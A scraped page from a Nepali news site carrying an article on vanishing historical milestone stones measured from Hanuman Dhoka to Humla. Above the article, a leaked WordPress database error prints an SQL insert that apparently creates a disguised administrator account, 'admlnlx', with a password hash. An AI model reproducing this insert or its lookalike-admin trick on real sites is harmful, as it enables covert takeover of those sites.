WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bi3LCdxzwNfq5co7d4b7Vxtm4hPTk01', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 15:17:27', '', 'admlnlx', 'admlnlx')

हराउँदै छन् कोशेढुङ्गाहरु – Gaule Khabar

हराउँदै छन् कोशेढुङ्गाहरु

हराउँदै छन् कोशेढुङ्गाहरु

कचहरी डट कम, हुम्ला ।।

उपलब्ध दस्तावेज अनुसार नेपालको एकीकरणपछि नेपालभरि कानुनी, प्रशासनिक तथा न्यायिक गतिविधिहरु सञ्चालन गर्नका लागि काठमाडौंको हनुमानढोकालाई आधार बनाएर देशभरि  नै कोशेढुङ्गाको स्थापना गरिएको पाइन्छ । विशेषत ः हुलाक सेवा, सरकारी कामकाजमा गाउँघरमा जाँदा र बन्दव्यापार गर्दा कुनै पनि स्थानमा आउनजान कति समय लाग्छ ।

सोका भौगोलिक मापन गर्नका लागि कोशेढुङ्गाको व्यवस्था गरिएको पाइन्छ । हनुमानढोका दरबारलाई शुन्य कोश मानि त्यहाँबाट हुम्लाको सिमकोट धुपीरुख १७९ कोश मानिएको छ । राजा राजेन्द्रको पालामा यसको अद्यावधि गरिएको पाइन्छ । त्यसपछिका शासकहरुले बेलाबेलामा कुनै ठाउँमा लोहस्तम्भ त कुनै ठाउँमा ढुङ्गेस्तम्भ बनाई प्रत्येक कोशमा राखिएको ठाउँलाई नै कोशढुङ्गा वा कोशचौर भनिन्छ । यस्ता ठाउँहरुमा ससाना चौतारी, बिसुन, पाटीपौवा, पानीका कुण्ड धारा तथा मुग्राहरु पनि बनाइएका हुन्छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका